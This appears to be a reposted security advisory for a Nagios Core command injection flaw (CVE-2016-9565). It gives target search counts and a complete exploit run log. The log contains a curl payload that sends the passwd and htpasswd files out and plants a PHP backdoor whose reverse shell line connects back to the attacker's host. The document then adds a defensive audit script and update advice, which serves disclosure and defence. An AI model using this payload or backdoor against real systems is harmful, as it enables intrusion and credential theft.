xl7dev

Nagios Exploit Command Injection CVE-2016-9565

0x01 Vulnerability Effect

Both of the Nagios Core stable branches 3.x and 4.x are affected
Nagios Core < 4.2.2 Curl Command Injection / Code Execution

0x02 Website

Nagios Core

0x03 Search Target

Zoomeye Total results: 252

Shodan Total results: 36

0x04 POC

nagios_cmd_injection.py

Video POC

Usage

Example exploit run
~~~~~~~~~~~~~~~~~~~~~

root@xenial:~/nagios-exploit# ./nagios_cmd_injection.py 192.168.57.3

Nagios Core < 4.2.0 Curl Command Injection PoC Exploit (CVE-2016-9565)
nagios_cmd_injection.py ver. 1.0

Discovered & Coded by:

Dawid Golunski
https://legalhackers.com

[+] Generating SSL certificate for our python HTTPS web server

[+] Starting the web server on ports 80 & 443

[+] Web server ready for connection from Nagios (http://target-svr/nagios/rss-corefeed.php). Time for your dnsspoof magic... ;)

[+] Received GET request from Nagios server (192.168.57.4) ! Sending redirect to inject our curl payload:

-Fpasswd=@/etc/passwd -Fgroup=@/etc/group -Fhtauth=@/usr/local/nagios/etc/htpasswd.users --trace-ascii /usr/local/nagios/share/nagios-backdoor.php

[+] Success, curl payload injected! Received data back from the Nagios server 192.168.57.4

[*] Contents of /etc/passwd file from the target:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
nagios:x:1001:1001::/home/nagios:/bin/sh
[..cut..]

[*] Contents of /usr/local/nagios/etc/htpasswd.users file:

nagiosadmin:$apr1$buzCfFb$GjV/ga6PHp53qePf0

[*] Retrieved nagios group line from /etc/group file on the target: nagios:x:1001:www-data

[+] Happy days, 'www-data' user belongs to 'nagios' group! (meaning writable webroot)

[*] Feed XML with JS payload returned to the client in the response. This should load nagios-backdoor.php in no time :)

[+] PHP backdoor should have been saved in /usr/local/nagios/share/nagios-backdoor.php on the target by now!

[*] Spawning netcat and waiting for the nagios shell (remember you can escalate to root via CVE-2016-9566 :)

Listening on [0.0.0.0] (family 0, port 8080)
Connection from [192.168.57.4] port 8080 [tcp/http-alt] accepted (family 2, sport 38718)

www-data@debjessie:/usr/local/nagios/share$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data),1001(nagios),1002(nagcmd)

www-data@debjessie:/usr/local/nagios/share$ groups
groups
www-data nagios nagcmd

www-data@debjessie:/usr/local/nagios/share$ cat nagios-backdoor.php
[..cut..]
== Info: Server <?php system("/bin/bash -c 'nohup bash -i >/dev/tcp/192.168.57.3/8080 0<&1 2>&1 &'"); die("stop processing"); ?> is not blacklisted
[..cut..]
www-data@debjessie:/usr/local/nagios/share$ ls -ld .
ls -ld .
drwxrwsr-x 16 nagios nagios 4096 Dec 9 20:00 .

www-data@debjessie:/usr/local/nagios/share$ exit
exit
exit

[+] Shell closed

[+] That's all. Exiting

0x05 Fix Bug

Update to the latest Nagios Core release.
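Two conditions in the run above decide how far this bug goes: the Nagios Core version (anything older than 4.2.2 is affected) and whether the web server user can write the Nagios webroot, which the exploit confirms by reading the nagios line from /etc/group and the mode of /usr/local/nagios/share. The audit helper below is an added example and is not part of the advisory or of Nagios. It checks both conditions offline from a version string, copies of the passwd and group files and an `ls -ld` line; the sample inputs are constructed to mirror the values shown in the exploit run, and the function and variable names are my own.

```python
import re

# Fixed release per the advisory heading: Nagios Core < 4.2.2 is affected.
FIXED_VERSION = (4, 2, 2)


def parse_version(version):
    """Turn a string such as '4.1.1' into a 3-tuple; missing parts become 0."""
    parts = re.findall(r"\d+", version)
    if not parts:
        raise ValueError(f"unrecognised version string: {version!r}")
    nums = [int(p) for p in parts[:3]]
    nums += [0] * (3 - len(nums))
    return tuple(nums)


def is_vulnerable_version(version):
    """True when the installed Nagios Core is older than the fixed 4.2.2 release."""
    return parse_version(version) < FIXED_VERSION


def groups_of(user, passwd_lines, group_lines):
    """Primary group (from passwd) plus supplementary groups (from group) of user."""
    gid_to_name = {}
    groups = set()
    for line in group_lines:
        fields = line.strip().split(":")
        if len(fields) < 4:
            continue  # skip malformed lines
        name, gid, members = fields[0], fields[2], fields[3]
        gid_to_name[gid] = name
        if user in [m for m in members.split(",") if m]:
            groups.add(name)
    for line in passwd_lines:
        fields = line.strip().split(":")
        if len(fields) >= 4 and fields[0] == user:
            groups.add(gid_to_name.get(fields[3], fields[3]))
    return groups


def can_write_dir(user, user_groups, ls_line):
    """Evaluate an 'ls -ld' line (mode, links, owner, group, ...) for write access by user.

    Only the owner/group/other write bits are consulted; the setgid 's' in the
    group execute slot (as in drwxrwsr-x) does not affect the result.
    """
    mode, _links, owner, group = ls_line.split()[:4]
    perms = mode[1:10]
    if user == owner:
        return perms[1] == "w"
    if group in user_groups:
        return perms[4] == "w"
    return perms[7] == "w"


def audit(version, web_user, passwd_lines, group_lines, webroot_ls):
    """Return a list of findings; an empty list means neither condition holds."""
    findings = []
    if is_vulnerable_version(version):
        findings.append(f"Nagios Core {version} is older than 4.2.2: update")
    groups = groups_of(web_user, passwd_lines, group_lines)
    if can_write_dir(web_user, groups, webroot_ls):
        findings.append(
            f"{web_user} can write the Nagios webroot (groups: {sorted(groups)})"
        )
    return findings


# Constructed sample data, modelled on the values in the exploit run above.
PASSWD_LINES = [
    "root:x:0:0:root:/root:/bin/bash",
    "nagios:x:1001:1001::/home/nagios:/bin/sh",
    "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin",
]
GROUP_LINES = [
    "root:x:0:",
    "www-data:x:33:",
    "nagios:x:1001:www-data",
    "nagcmd:x:1002:nagios,www-data",
]
# Webroot as seen in the run: group-writable and owned by group nagios.
LS_VULNERABLE = "drwxrwsr-x 16 nagios nagios 4096 Dec 9 20:00 ."
# Same directory with the group write bit removed (chmod g-w).
LS_HARDENED = "drwxr-sr-x 16 nagios nagios 4096 Dec 9 20:00 ."

if __name__ == "__main__":
    for finding in audit("4.1.1", "www-data", PASSWD_LINES, GROUP_LINES, LS_VULNERABLE):
        print("[!]", finding)
    print("hardened host findings:", audit("4.2.2", "www-data", PASSWD_LINES, GROUP_LINES, LS_HARDENED))
```

On a real host, feed it the output of `nagios --version`, `/etc/passwd`, `/etc/group` and `ls -ld /usr/local/nagios/share`. Either removing the web server user from the nagios group or clearing the group write bit on the share directory makes the second finding disappear; updating past 4.2.2 clears the first.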

0x06 From

https://legalhackers.com/advisories/Nagios-Exploit-Command-Injection-CVE-2016-9565-2008-4796.html